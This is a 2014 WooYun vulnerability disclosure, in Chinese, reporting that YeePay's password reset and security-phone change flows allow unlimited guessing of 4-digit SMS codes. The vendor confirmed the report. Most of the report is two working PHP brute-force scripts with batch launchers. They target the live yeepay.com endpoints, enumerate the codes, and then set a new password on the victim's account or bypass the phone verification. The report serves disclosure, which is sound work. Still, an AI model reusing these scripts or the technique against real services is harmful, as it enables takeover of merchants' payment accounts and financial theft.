当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-060501

漏洞标题:易宝支付任意修改密码漏洞(爆破)

相关厂商:易宝支付

漏洞作者: 糊涂刺猬

提交时间:2014-05-16 14:32

修复时间:2014-06-30 14:33

公开时间:2014-06-30 14:33

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-05-16: 细节已通知厂商并且等待厂商处理中
2014-05-19: 厂商已经确认,细节仅向厂商公开
2014-05-29: 细节向核心白帽子及相关领域专家公开
2014-06-08: 细节向普通白帽子公开
2014-06-18: 细节向实习白帽子公开
2014-06-30: 细节向公众公开

简要描述:

知道商户的注册邮箱,可以任意修改商户密码,以及更换密保手机

详细说明:

1.由于对手机认证码的验证次数不识别的原因,4位数字验证码可以在10分钟穷举出用户密码
首页,点击找回密码后,输入用户email以及验证码,点击发送验证码。
之后可以无限次的试验证码,由于验证码只有4位,通过程序穷举。
2.修改新密码后,可以登录进入会员中心,修改动态密码手机,理由如1.

漏洞证明:

忘记密码:
forget.bat

set PATH=%cd%\php\;%cd%\php\ext
set PHPRC=%cd%\php\
cls
%cd%\php\php.exe %cd%\forget.php 0
pause


forget.php

<?php
$newpassword='my198191';
$num= intval($argv[1]);
$user=array(
'user_name'=>'用户名'
);
$num=$num+1000;
for($i=$num;$i<10000;$i++){
$user['dynapasswd']=$i;
$data=get_michtml("https://www.yeepay.com/selfservice/verifyCallBackPwdInfo.action",$user,"GBK","SSL","yeepay_pay","yeepay_pay");
echo $data['output']."\r\n";
$output=$data['output'];
$output=str_replace("{",'{"',$output);
$output=str_replace("}",'"}',$output);
$output=str_replace(':','":"',$output);
$output=str_replace(',','","',$output);
$outdata=json_decode($output,true);
if(isset($outdata['retCode']) && ($outdata['retCode']=="1")){
echo '验证码为:'.$i."\r\n".$data['output'];
unset($user['dynapasswd']);
$user['method']="init";
$user['callbackType']="mobile";
$data=get_michtml("https://www.yeepay.com/selfservice/forgotPwdRetrieve.action",$user,"GBK","SSL","yeepay_pay","yeepay_pay");
$user['method']="retrieve";
$user['password']=$newpassword;
$user['password1']=$newpassword;
$data=get_michtml("https://www.yeepay.com/selfservice/forgotPwdRetrieve.action",$user,"GBK","SSL","yeepay_pay","yeepay_pay");
echo '新密码为:'.$newpassword;
break;
}else{
echo '正在检测:'.$i."\r\n";
}
}
sleep(1000000);
function get_michtml($url,$data=array(),$html_char='UTF-8',$is_ssh='http',$cookiejar='',$cookiefile=''){
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_TIMEOUT, 6000);
curl_setopt ($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9) Gecko/2008052906 Firefox/3.0');

if($is_ssh=='SSL'){
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
}
curl_setopt($ch, CURLOPT_FOLLOWLOCATION,1);
if(!empty($data)){
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
}
$cookiespath = dirname(__FILE__).DIRECTORY_SEPARATOR;


if($cookiefile){
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiespath.$cookiefile.'.txt');
}
if($cookiejar){
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiespath.$cookiefile.'.txt');
}
$output = curl_exec($ch);
if($html_char!='GBK'){
$output=mb_convert_encoding($output, "GBK", $html_char);
}
$info = curl_getinfo($ch);
curl_close($ch);
$returntemp = array('output'=>$output,'info'=>$info);
return $returntemp;

}
?>


修改验证手机:
yeepay.bat

set PATH=%cd%\php\;%cd%\php\ext
set PHPRC=%cd%\php\
cls
%cd%\php\php.exe %cd%\yeepay.php 0
pause


yeepay.php

<?php
$num= $argv[1];
$user=array(
'username'=>'用户名',
'callbackUrl'=>'https://www.yeepay.com/login/shopBack/',
'password'=>'密码',
);
$data=get_michtml("https://www.yeepay.com/selfservice/customerLoginInterface.action",$user,"GBK","SSL","yeepay_login","yeepay_login");
$prex='/<input type="hidden" name="(.*)" value="(.*)" \/>/isU';
preg_match_all($prex, $data["output"], $reg);
if(isset($reg[1]) &&(count($reg[1])==2)){
$user=array();
$user[$reg[1][0]]=$reg[2][0];
$user[$reg[1][1]]=$reg[2][1];
$data=get_michtml("https://www.yeepay.com/selfservice/validateCustomerCert.action",$user,"GBK","SSL","yeepay_login","yeepay_login");
if(!$num){
$data=get_michtml("http://www.yeepay.com/selfservice/sendModifyMobileSMSAjax.action",$user,"GBK","http","yeepay_login","yeepay_login");
}
$num=$num+1000;
for($i=$num;$i<10000;$i++){
$user=array(
"smsCode"=>$i,
);
$data=get_michtml("http://www.yeepay.com/selfservice/verifyOldMobileSms.action",$user,"GBK","SSL","yeepay_login","yeepay_login");
if(stristr($data["output"],"验证码错误")){
echo "检测:".$i."\r\n";
}else{
if(stristr($data["output"],"verifyNewMobileSms.action")){


echo "验证码为:".$i."\r\n";
break;
}else{
echo "疑似检测:".$i."\r\n";

}
}
}


}else{
echo '用户名密码错误';
}
sleep(10000000);
function get_michtml($url,$data=array(),$html_char='UTF-8',$is_ssh='http',$cookiejar='',$cookiefile=''){
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_TIMEOUT, 6000);
curl_setopt ($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9) Gecko/2008052906 Firefox/3.0');

if($is_ssh=='SSL'){
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
}
curl_setopt($ch, CURLOPT_FOLLOWLOCATION,1);
if(!empty($data)){
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
}
$cookiespath = dirname(__FILE__).DIRECTORY_SEPARATOR;


if($cookiefile){
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiespath.$cookiefile.'.txt');
}
if($cookiejar){
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiespath.$cookiefile.'.txt');
}
$output = curl_exec($ch);
if($html_char!='GBK'){
$output=mb_convert_encoding($output, "GBK", $html_char);
}
$info = curl_getinfo($ch);
curl_close($ch);
$returntemp = array('output'=>$output,'info'=>$info);
return $returntemp;

}
?>

修复方案:

版权声明:转载请注明来源 糊涂刺猬@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2014-05-19 14:12

厂商回复:

感谢您的提交,请将联系方式发送我们,以便我们发送礼物已表谢意

最新状态:

暂无